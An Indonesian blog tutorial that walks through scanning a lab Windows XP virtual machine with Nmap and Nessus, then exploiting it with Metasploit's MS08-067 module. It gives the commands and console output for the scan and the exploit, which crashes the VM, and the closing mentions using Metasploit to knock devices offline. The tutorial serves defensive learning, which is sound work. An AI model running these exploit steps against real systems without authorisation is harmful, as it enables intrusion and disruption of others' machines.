Belajar menjadi seorang Penetrasi Tester

13 Aug 2013

Buat Orang Orang Admin Jaringan, Pernahkah bertanya-tanya seberapa aman jaringan Anda? Dengan membaca artikel ini mudah mudahan dapat memberikan gambaran dan menyediakan sarana untuk melindungi jaringan kita sendiri.

Selama bertahun-tahun dalam karir IT saya, saya telah menjadi lebih konsern dan peduli dengan keamanan jaringan. Saya yakin semua orang memiliki untuk tingkat pemahaman berbeda-beda untuk memahami keamanan jaringan IT masing-masing, tapi bagi saya, itu telah menjadi bagian sehari-hari dari pekerjaan saya (bukan bahwa aku mengeluh, sebaliknya, itu cukup menarik). Dengan demikian, ada banyak tool-tool yang saya gunakan untuk menyelesaikan pekerjaan IT Admin. Beberapa saya suka, dan beberapa tidak. Tapi, saya tetap berpatokan pada tiga tool yaitu: Nmap, Nessus dan Metasploit.

Pada artikel ini, saya akan jelas penggunakaan tiga tools tersebut untuk memberikan Anda gambaran tentang bagaimana menggunakannya. Saya juga memberikan beberapa contoh dari pengalaman saya sendiri untuk lebih menjelaskan bagaimana saya menggunakan tool ini (dan bagaimana Anda mungkin bisa menggunakannya) di dunia nyata.

Nmap adalah tool untuk entry point ketika memulai investigasi saya pada sistem. Nmap ini sendiri telah lama digunakan orang sejak tahun 1997. Ini adalah tool pemindaian yang memungkinkan Anda untuk melakukan berbagai tugas, seperti remote pemindaian, fingerprint, pemantauan dan fungsi seperti lainnya. Ini menggunakan berbagai teknik seperti manipulasi paket untuk mendapatkan jawaban atas pertanyaan-pertanyaan seperti jenis sistem operasi yang digunakan atau versi perangkat lunak melayani web yang berjalan pada target.

Tool berikutnya adalah Metasploit. Metasploit mulai ada sejak awal 2003. Metasploit merupakan framework untuk mengembangkan dan menguji kerentanan (ini adalah fungsi utamanya, fitur-fiturnya tampaknya hampir tak terbatas). Ini adalah tool yang bagus untuk menguji keamanan server.

Akhirnya, tool terakhir (the last but not least) adalah Nessus. Nessus adalah scanner yang mirip dengan Nmap dan telah ada sejak sekitar tahun 1998. Namun, Nessus mampu menemukan kode kerentanan terhadap mesin seperti Metasploit (sedangkan Metasploit dapat digunakan baik untuk mengembangkan dan menjalankan kode eksploitasi), tetapi pada tingkat yang jauh lebih sederhana. Bahkan, itu point penting Nessus, mudah digunakan, seperti Nmap, dan memiliki beberapa kekuatan dari Metasploit. Tergantung pada situasi, saya dapat menggunakan salah satu atau semua tool ini, yang membawa saya ke titik-duplikasi yang baik.

Ketiga tool ini mampu melakukan scan dasar. Namun, menurut saya Nmap berjalan tercepat dan menawarkan metode pemindaian yang tidak terlalu mengganggu. Terlepas dari fitur duplikasi dalam tool ini, coba luangkan waktu untuk mempelajari fitur individu masing-masing alat untuk menemukan apa yang terbaik untuk Anda. Anda mungkin menemukan bahwa meskipun Nmap cepat, Anda menyukai gagasan scanning dan pemanfaatan dengan Nessus (semua dalam satu langkah, jika Anda mau). Anda mungkin suka kesederhanaan Nessus tetapi membutuhkan kekuatan Metasploit (untuk scripting dan pengelompokan tes bersama-sama). Meskipun mereka semua mendapatkan pekerjaan yang dilakukan, itu tergantung pada situasi Anda, bagaimana Anda menggunakan tool ini.

Hal pertama yang harus dilakukan adalah menginstal tool ini. OS yang saya gunakan adalah Linux Ubuntu, jadi saya asumsikan Anda menjalankan ini pada platform Linux, tetapi semua tool - tool ini bisa bekerja pada Windows juga. Anda dapat menginstal tool ini dari repositori Anda, tapi saya sarankan pergi ke situs web masing-masing tool dan menginstal dari paket nya (ini memastikan bahwa Anda mendapatkan versi terbaru dengan semua perbaikan saat ini dan memberikan keberhasilan terbaik untuk instalasi).

Instalasi cukup sederhana, cukup ikuti langkah-langkah dari situs masing-masing tool itu, dan Anda akan baik-baik saja. Segera setelah semuanya terpasang, saatnya untuk mulai bermain dengan mereka. Saya sangat merekomendasikan bahwa Anda memiliki sebuah mesin virtual atau mesin uji semacam sebagai target pertama Anda, agar tidak kecelakaan sesuatu yang kritis. Ini tentunya sangat membantu buat yang baru belajar dan ingin tahu hasilnya secara real, virtual yang saya gunakan adalah Virtual Box milik SUN.

Untuk tujuan artikel ini, saya akan bikin sebuah contoh skenario. Saya akan menggunakan mesin virtual dengan Windows XP (SP3) dimuat di atasnya. Mesin ini akan menjadi instalasi baru tanpa patch dan firewall dinonaktifkan. Alasan untuk ini, cukup sederhana, adalah untuk bersikap realistis ketika menjalankan scan ini. Saya telah mengkonfigurasi mesin host untuk menggunakan IP 192.168.56.1, dan mesin tamu untuk menggunakan IP 192.168.56.101.

83764159c6881b4c43c69951a693e47d_11164f1

Gambar Windows XP Virtual

898f4dc6600b5a42a1170d550deda27e_11164f2

Gambar Mesin Scanning

Mari kita mulai dengan Nmap untuk memulai tahap pengumpulan informasi pada target Anda. Karena Anda tahu IP dari mesin tersebut, Anda tidak perlu tapi dengan mudah bisa menjalankan scan terhadap subnet atau beberapa subset lain dari alamat IP. Untuk artikel ini, mari kita tetap dengan 192.168.56.101. Di terminal, jalankan berikut (ingat bahwa Anda dapat menjalankan perintah ini sebagai user biasa pada mesin, asalkan mengatakan pengguna memiliki akses ke / usr / bin /):

nmap -sV -A -v 192.168.56.101 > /tmp/nmap-output

Saya selalu mengirim output ke dalam file, karena lebih mudah untuk membaca sesudahnya. Sebelum membahas output, bagaimanapun, mari kita lihat mereka parameter apa yang digunakan:

-sV - ini memberitahu Nmap tipe scanner. Dalam kasus ini, itu versi scan berguna untuk melihat program-program apa yang berjalan dan pada apa port yang digunakan.

-A - ini memberitahu Nmap untuk menjalankan pemeriksaan FingerPrint. Ini berarti Nmap akan berusaha untuk mengidentifikasi versi OS dan informasi yang berkaitan dengan Versi OS tersebut.

-v - verbosity-ini penting, karena Anda perlu ini untuk mendapatkan informasi penting dari Nmap.
Contoh output scanning dari Nmap

Starting Nmap 5.50 ( http://nmap.org ) at 2011-11-07 15:45 EST
NSE: Loaded 57 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating ARP Ping Scan at 15:45
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 15:45, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:45
Completed Parallel DNS resolution of 1 host. at 15:45, 0.02s elapsed
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.56.101 [1000 ports]
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Discovered open port 135/tcp on 192.168.56.101

Completed SYN Stealth Scan at 15:46, 1.15s elapsed (1000 total ports)
Initiating Service scan at 15:46
Scanning 3 services on 192.168.56.101
Completed Service scan at 15:46, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.15s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5B:91:AC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=245 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Host script results:
| nbstat:
| NetBIOS name: XPTESTVM, NetBIOS user: ,
| NetBIOS MAC: 08:00:27:5b:91:ac (Cadmus Computer Systems)
| Names
| XPTESTVM<00> Flags:
| WORKGROUP<00> Flags:
| XPTESTVM<20> Flags:
| WORKGROUP<1e> Flags:
| WORKGROUP<1d> Flags:
|_ \x01\x02__MSBROWSE__\x02<01> Flags:
|_smbv2-enabled: Server doesn’t support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: WORKGROUP\XPTESTVM
|_ System time: 2011-11-07 15:46:06 UTC-5

TRACEROUTE
HOP RTT ADDRESS
1 0.77 ms 192.168.56.101

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
NSE: Starting runlevel 2 (of 2) scan.
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect
results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
Raw packets sent: 1072 (47.866KB) | Rcvd: 1017 (41.234KB)

Seperti yang dapat Anda lihat dari output diatas, Anda dapat mengidentifikasi bahwa ini memang sebuah platform Windows, kemungkinan besar XP dengan service pack 2 atau 3 atau 2003 server. Jenis scan scan fingerprint, yang memungkinkan Anda untuk mengidentifikasi OS dan setiap layanan pengujian bernilai semaksimal mungkin. Kenyataan bahwa Anda dapat menarik informasi ini banyak dari scan yang sangat dasar saja menunjukkan rendahnya tingkat perlindungan dan tingkat ancaman yang tinggi. Anda dengan mudah dapat menduga bahwa tidak ada firewall lokal pada Mesin Virtual Windows ini.

Meskipun Anda bisa menjalankan berbagai jenis scan terhadap Mesin Virtual ini untuk mendapatkan informasi lebih lanjut, Anda memiliki cukup di sini untuk melanjutkan. Anda bisa mempersempit apakah ini adalah server melalui proses eliminasi. Misalnya, jika ini adalah desktop, kemungkinan itu menjalankan layanan Database Server seperti MS SQL atau Exchange. Untuk memastikan lagi maka lanjutkan ke alat kedua, Nessus.

Nessus sekarang menggunakan antarmuka Web, namun Anda masih dapat menggunakan baris perintah jika Anda lebih suka (ingat untuk membaca halaman manual). Untuk artikel ini meskipun, mari kita tetap dengan antarmuka Web. Setelah Anda login ke GUI Web, klik pada link scan untuk mulai mengkonfigurasi scan.
a30853124bdcd9d5a02911e07b055883_11164f3

Gambar 3 , Halaman Awal Nessus

c94b0d251a550a5fcdf3f5bdd4c28a28_11164f4

Gambar 4, Halaman Scan Nessus

Setelah Anda klik add, mengkonfigurasi scan menggunakan pengaturan ini dasar (Gambar 5). Ini akan memberi Anda scan cepat dengan dampak minimal, yang merupakan kunci pada jaringan internal. Sehingga tidak mengganggu lalu lintas jaringan.

9b2f28750dfc8e59d64989294955f7da_11164f5

Gambar 5, Halaman Konfigurasi Scan Nessus

Setelah komplit, klik Report dan klik dobel report buat membukanya
51b7bf2da6c4516b6389c4445b533382_gambar6

Gambar 6 Nessus Report

Lihatlah report secara detail dengan mengklik IP dalam report. Di sini Anda akan melihat tabel dipilah oleh tingkatan tertentu. Seperti yang Anda lihat, Secara khusus, mari kita lihat masalah RPC. Buka dan lihatlah daftar (Gambar 7).

31d2e47f8fc47a5d0bd8f574cdb432a9_gambar7

Gambar 7.

Apa yang dapat Anda ambil dari ini adalah bahwa RPC adalah layanan perhatian dan Nessus dengan sendirinya memberikan informasi nama exploit yang bisa mengancamnya. Plugin ID memberitahu Anda yang plugin untuk digunakan untuk menguji mengeksploitasi, nama memberi Anda beberapa detail tentang masalah ini, dan port dan tingkat keparahan yang cukup jelas. Dengan mengklik pada nama, Anda menarik sebuah jendela yang menyediakan banyak detail, termasuk apa versi yang terpengaruh, patch dirilis untuk memperbaikinya dan berbagai informasi lainnya

8ceadac28849977217acb8d5da62506f_gambar8

(Gambar 8).

Setelah mendapatkan informasi yang cukup mari kita membawa alat akhir, Metasploit.

Mengapa menggunakan dua alat yang berbeda yang dapat melakukan pekerjaan yang sama? Preferensi, sebagian besar. Saya menemukan Metasploit yang jauh lebih cocok untuk eksploitasi dari Nessus. Itu bukan untuk mengatakan Nessus tidak mendapatkan pekerjaan yang dilakukan, namun Metasploit dibangun khusus untuk tujuan ini. Fungsi nessus dan Nmap lebih untuk mendapatkan informasi yang lebih jelas sehingga target lebih akurat.

Mulailah dengan membuka sebuah terminal, su ke root (jika Anda telah memberikan akses user biasa untuk file yang tepat / direktori untuk Metasploit, yang terbaik untuk dijalankan sebagai user tersebut bukan root), dan menjalankan perintah msfconsole (Gambar 9).
849cc7c849276dd7614f9f3d54224319_gambar9

Gambar 9 Tampilan Metasploit

Setelah Anda mendapatkan kembali ke prompt, hal pertama yang harus dilakukan adalah memilih mengeksploitasi Anda untuk menguji. Untuk melihat semua eksploitasi yang tersedia, ketik berikut ini, kemudian pergi mendapatkan secangkir kopi, karena ini membutuhkan waktu satu menit atau dua …:

show exploits

Oke, untuk tujuan contoh ini, mari kita gunakan perintah berikut (Gambar 10 menunjukkan hasil), yang sesuai dengan kesalahan sebelumnya terlihat dari Nessus (Gambar 8):

use exploit/windows/smb/ms08_067_netapi

f9aec1efdfed9228510dfcd5d0f16ddc_gambar10

Gambar 10. Daftar Exploits

Anda bisa menggunakan exploit yang lain, dimana ini bisa membuat Mesin Virtual crash, tapi mari kita coba untuk tidak terlalu merusak. Dengan exploit yang telah dipilih, sekarang Anda harus memilih payload. Payload adalah set instruksi untuk mengirim melalui exploit untuk mendapatkan hasil yang diinginkan. Dalam kasus ini, Anda ingin untuk menyiarkan pesan ke komputer. Pertama, tampilkan daftar payload Anda dengan menjalankan berikut:

show payloads

Lalu pilihlah salah satu payload dengan perintah

set payload windows/speak_pwned

e280b4b77dcfc6bd0f601a48ab07ff89_gambar11

Terakhir, tampilkan option dari payload untuk melihat apa apa yang perlu ditambahkan. Dalam kasus ini memasukkan IP target (IP di Kotak Virtual).

msf exploit(ms08_067_netapi) > set payload windows/speak_pwned
payload => windows/speak_pwned
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes Pipe name to use (BROWSER, SRVSVC)

Payload options (windows/speak_pwned):

Name Current Setting Required Description
—- ————— ——– ———–

Exploit target:

Id Name
– —-
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > exploit

[*] Automatically detecting the target…
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

Seperti dilihat, Exploit telah komplit. Dan jika komputer suaranya aktif pada mesin virtual, anda seharus mendengar sesuatu sebagai efek dari “pwnd”. Jika anda perhatikan Mesin Windows, akan langsung crash karena efek exploit tersebut.
391e236c519ae7004939000d647c94b8_gambar12

Gambar 12. Kotak Virtual Crash

Anda dapat mencoba dengan exploit lain, sehingga akan di dapat gambaran bagaimana cara Pentest itu dilakukan. Dan selalu coba pada Mesin Virtual dahulu sebagai latihan.

Penutup

Seperti yang Anda lihat, ketiga tools, bila digunakan bersama-sama, akan membuat pemeriksaan bisa menjadi jelas dan tepat dan sebagai dasar untuk laporan yang baik. Gunakan secara bijak, tool ini dapat membantu mempertahankan jaringan Anda terhadap ini serangan dari luar. Nmap untuk melakukan scan acak pada subnet saya untuk komputer baru, Nessus untuk menyelidiki lebih lanjut dan menemukan kerentanan, dan Metasploit untuk menonaktifkan perangkat jika diperlukan (itu terjadi lebih dari yang Anda pikirkan). Saya juga menggunakan tool ini untuk membuat laporan, memberikan presentasi kepada manajemen dan menjaga jaringan saya sehat secara umum. Saya belajar sesuatu yang baru setiap kali saya menjalankannya, baik tentang alat sendiri atau jaringan saya, sehingga menjaganya agar tetap menarik.


TAGS metasploit nmap pentest


-

Author

Follow Me